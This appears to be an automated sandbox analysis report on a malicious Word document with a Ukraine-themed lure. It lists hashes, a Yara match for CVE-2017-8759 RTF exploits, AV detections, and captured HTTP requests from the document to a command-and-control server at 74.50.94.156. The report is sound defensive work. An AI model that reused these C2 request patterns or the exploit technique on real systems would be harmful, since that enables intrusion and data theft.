
Windows Analysis Report
Overview_of_UWCs_UkraineInNATO_campaign.docx.doc

Overview

General Information

Sample Name: Overview_of_UWCs_UkraineInNATO_campaign.docx.doc
Analysis ID: 1266120
MD5: d227874863036b8e73a3894a19bd25a0
SHA1: 2400b169ee2c38ac146c67408debc9b4fa4fca5f
SHA256: a61b2eafcf39715031357df6b01e85e0d1ea2e8ee1dfec241b114e18f7a1163f
Tags: 74-50-94-156, doc, docx, HUN

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Document Viewer accesses SMB path (likely to steal NTLM hashes or to download payload)
Opens network shares
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Potential document exploit detected (performs HTTP gets)
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 5296 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • splwow64.exe (PID: 7060 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)
  • cleanup
No configs have been found
Yara rule matches:
Source: afchunk.rtf
Rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2
Description: detects CVE-2017-8759 weaponized RTF documents.
Author: ditekSHen
Strings:
  • 0xa018:$clsid3: 4d73786d6c322e534158584d4c5265616465722e
  • 0x3eab:$ole2: D0CF11E0A1B11AE1
  • 0xa060:$ole2: d0cf11e0a1b11ae1
  • 0x26d6:$obj2: \objdata
  • 0x3e60:$obj2: \objdata
  • 0x2683:$obj3: \objupdate
  • 0x2678:$obj5: \objautlink
  • 0x3de2:$obj5: \objautlink
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: Overview_of_UWCs_UkraineInNATO_campaign.docx.doc | Avira: detected
Source: Overview_of_UWCs_UkraineInNATO_campaign.docx.doc | ReversingLabs: Detection: 29%
Source: Overview_of_UWCs_UkraineInNATO_campaign.docx.doc | Virustotal: Detection: 49%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: global traffic | TCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global traffic | TCP traffic: 74.50.94.156:80 -> 192.168.2.6:49708
Source: global traffic | TCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global traffic | TCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global traffic | TCP traffic: 74.50.94.156:80 -> 192.168.2.6:49708
Source: global traffic | TCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global traffic | TCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global traffic | TCP traffic: 74.50.94.156:80 -> 192.168.2.6:49708
Source: global traffic | TCP traffic: 74.50.94.156:80 -> 192.168.2.6:49708
Source: global traffic | TCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global traffic | TCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global traffic | TCP traffic: 74.50.94.156:80 -> 192.168.2.6:49708
Source: global traffic | TCP traffic: 74.50.94.156:80 -> 192.168.2.6:49708
Source: global traffic | TCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global traffic | TCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global traffic | TCP traffic: 74.50.94.156:80 -> 192.168.2.6:49708
Source: global traffic | TCP traffic: 74.50.94.156:80 -> 192.168.2.6:49708
Source: global traffic | TCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global traffic | TCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global traffic | TCP traffic: 74.50.94.156:80 -> 192.168.2.6:49708
Source: global traffic | TCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global traffic | TCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global traffic | TCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global traffic | TCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global traffic | TCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global traffic | TCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global traffic | HTTP traffic detected:
GET /MSHTML_C7/start.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 74.50.94.156
Connection: Keep-Alive

Source: global traffic | HTTP traffic detected:
GET /MSHTML_C7/RFile.asp HTTP/1.1
Accept: */*
Referer: http://74.50.94.156/MSHTML_C7/start.xml
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 74.50.94.156
Connection: Keep-Alive

Source: global traffic | HTTP traffic detected:
GET /MSHTML_C7/zip_k.asp?d=84.17.52.5_4f657_ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 74.50.94.156
Connection: Keep-Alive

Source: global traffic | HTTP traffic detected:
GET /MSHTML_C7/zip_k2.asp?d=84.17.52.5_4f657_ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 74.50.94.156
Connection: Keep-Alive
Cookie: ASPSESSIONIDCSTDATTC=AADBNNGBMMLHHHBHDOHGHCFP

Source: global traffic | HTTP traffic detected:
GET /MSHTML_C7/zip_k3.asp?d=84.17.52.5_4f657_ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 74.50.94.156
Connection: Keep-Alive
Cookie: ASPSESSIONIDCSTDATTC=AADBNNGBMMLHHHBHDOHGHCFP
Source: unknown | TCP traffic detected without corresponding DNS query: 74.50.94.156 (12 identical entries)
Source: ~WRS{D1A74FD9-95F0-4A7B-AE12-DD660EE646E9}.tmp.0.dr | String found in binary or memory: http://74.50.94.156/MSHTML_C7/start.xml
Source: ~WRF{23F61671-1248-4D9F-BE58-51806C7F80DF}.tmp.0.dr | String found in binary or memory: http://74.50.94.156/MSHTML_C7/start.xmlyX
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.aadrm.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.aadrm.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.cortana.ai
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.diagnostics.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.microsoftstream.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.microsoftstream.com/api/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.office.net
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.officescripts.microsoftusercontent.com/api
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.onedrive.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://api.scheduler.
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://apis.live.net/v5.0/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://augloop.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://augloop.office.com/v2
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://cdn.designerapp.osi.office.net/designer-mobile
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://cdn.entity.
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://cdn.hubblecontent.osi.office.net/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://cdn.int.designerapp.osi.office.net/fonts
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://clients.config.office.net
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://clients.config.office.net/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://config.edge.skype.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://cortana.ai
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://cortana.ai/api
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://cr.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://d.docs.live.net
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://dataservice.o365filtering.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://dataservice.o365filtering.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://designerapp.officeapps.live.com/designerapp
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://dev.cortana.ai
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://devnull.onenote.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://directory.services.
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://ecs.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://ecs.office.com/config/v1/Designer
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://enrichment.osi.office.net/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://graph.ppe.windows.net
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://graph.ppe.windows.net/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://graph.windows.net
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://graph.windows.net/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/pivots/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://incidents.diagnostics.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://invites.office.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://lifecycle.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://login.microsoftonline.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://login.microsoftonline.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://login.windows.local
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://make.powerautomate.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://management.azure.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://management.azure.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://messaging.action.office.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://messaging.engagement.office.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://messaging.lifecycle.office.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://messaging.office.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://my.microsoftpersonalcontent.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://ncus.contentsync.
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://ncus.pagecontentsync.
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://officeapps.live.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.dr | String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
